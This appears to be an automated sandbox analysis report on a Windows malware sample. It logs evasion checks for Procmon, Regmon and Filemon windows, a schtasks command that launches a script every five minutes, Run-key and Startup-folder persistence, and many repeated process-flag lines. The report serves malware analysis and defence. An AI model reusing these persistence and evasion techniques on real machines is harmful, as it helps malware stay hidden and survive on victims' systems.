Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: Regmonclass	Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url

Source: C:\Users\user\Desktop\random.exe

File created: C:\Windows\Tasks\rapes.job

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 61c1a86413.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 61c1a86413.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run afdbfd8fdc.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run afdbfd8fdc.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7fd483a527.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7fd483a527.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 26335e66aa.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 26335e66aa.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b794b2f69e.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b794b2f69e.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_010426DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		51_2_010426DD
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_00FCFC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		51_2_00FCFC7C

Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Process information set: NOOPENFILEERRORBOX
